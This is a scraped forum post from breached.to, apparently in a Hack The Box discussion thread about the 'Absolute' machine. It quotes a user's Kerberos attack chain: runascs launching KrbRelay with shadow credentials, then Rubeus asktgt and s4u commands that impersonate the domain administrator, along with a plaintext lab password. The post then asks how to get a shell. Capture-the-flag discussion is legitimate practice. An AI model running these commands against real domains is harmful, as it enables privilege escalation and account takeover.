<div class="post_head">
<div class="float_right" style="vertical-align: top">
<!--<strong><a href="Thread-RaidForums-Official-Telegram?pid=556933#pid556933" title="RaidForums Official Telegram">#1</a></strong>-->
<div class="float_right" style="vertical-align: top">
<strong><a href="Thread-Absolute-HTB-Discussion?pid=556933#pid556933" title="RE: Absolute - HTB [Discussion]">#133</a></strong>
</div>
</div>
<span class="post_date"><span title="September 29, 2022, 07:23 PM">4 hours ago</span> <span class="post_edit" id="edited_by_556933">
<span class="edited_post">(This post was last modified: <span title="September 29, 2022, 08:39 PM">2 hours ago</span> by <a href="https://breached.to/User-samhub123">samhub123</a>.)</span>
</span></span>
</div>
<div class="post_body scaleimages" id="pid_556933">
<blockquote class="mycode_quote"><cite><span> (<span title="September 29, 2022, 05:57 PM">5 hours ago</span>)</span>yumi Wrote:  <a class="quick_jump" href="https://breached.to/Thread-Absolute-HTB-Discussion?pid=556306#pid556306" rel="nofollow"></a></cite>Rubeus worked here trying  follow  <a class="mycode_url" href="https://icyguider.github.io/2022/05/19/NoFix-LPE-Using-KrbRelay-With-Shadow-Credentials.html" rel="noopener" target="_blank">https://icyguider.github.io/2022/05/19/N...tials.html</a><br>
<br>
but i fail to convert kirb to ccache using  <a class="mycode_url" href="https://github.com/SolomonSklash/RubeusToCcache" rel="noopener" target="_blank">https://github.com/SolomonSklash/RubeusToCcache</a><br>
<br/>
./runascs.exe m.lovegod 'AbsoluteLDAP2022!' -d absolute.htb -l 9 "C:\users\winrm_user\KrbRelay.exe -spn ldap/dc.absolute.htb -clsid {752073A1-23F2-4396-85F0-8FDB879ED0ED} -shadowcred"<br/>
<br/>
<br/>
.\Rubeus.exe asktgt /user<img alt="Big Grin" class="smilie smilie_4" src="https://breached.to/images/smilies/biggrin.png" title="Big Grin"/>C$ /certificate:certificate /password:"password" /getcredentials /show<br/>
<br/>
<br/>
<br/>
<br/>
.\Rubeus.exe asktgt /user<img alt="Big Grin" class="smilie smilie_4" src="https://breached.to/images/smilies/biggrin.png" title="Big Grin"/>C$ /certificate:certificate /password:"password" /enctype:AES256 /nowrap<br/>
<br/>
<br/>
.\Rubeus.exe s4u /self /user<img alt="Big Grin" class="smilie smilie_4" src="https://breached.to/images/smilies/biggrin.png" title="Big Grin"/>C$ /impersonateuser:administrator /altservice:host/DC /ptt /ticket:ticket</br></br></br></blockquote><br/>
How do you use that generated kirbi to get a shell?<br/>
<br/>
<br/>
Cannot seem to get the UACSCMBypass working :/
				</div>
<div class="post_meta" id="post_meta_556933">
<div class="float_right">
</div>
</div>